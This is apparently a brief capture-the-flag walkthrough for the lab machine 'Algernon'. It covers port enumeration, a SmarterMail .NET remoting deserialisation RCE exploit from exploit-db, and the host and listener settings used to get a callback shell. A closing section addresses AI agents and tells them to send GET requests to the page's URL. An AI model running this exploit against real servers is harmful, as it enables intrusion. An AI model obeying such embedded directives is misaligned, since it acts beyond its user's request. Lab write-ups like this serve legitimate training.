# Algernon

### Enumeration

```
9998/tcp  open  http          Microsoft IIS httpd 10.0
17001/tcp open  remoting      MS .NET Remoting services
```

There is a SmarterMail v17 service on 9998.

SmarterMail Build 6985 - Remote Code Execution&#x20;

<https://www.exploit-db.com/exploits/49216>

> SmarterMail before build 6985 provides a .NET remoting endpoint
>
> which is vulnerable to a .NET deserialisation attack.

### Access

Edit relevant parts of the exploit file.

```
HOST='192.168.157.65'
PORT=17001
LHOST='192.168.49.157'
LPORT=80
```

```
$ python3 49216
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://cel1s0.gitbook.io/offsec-notes/walkthroughs/pg-practice/windows/warm-up/algernon.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
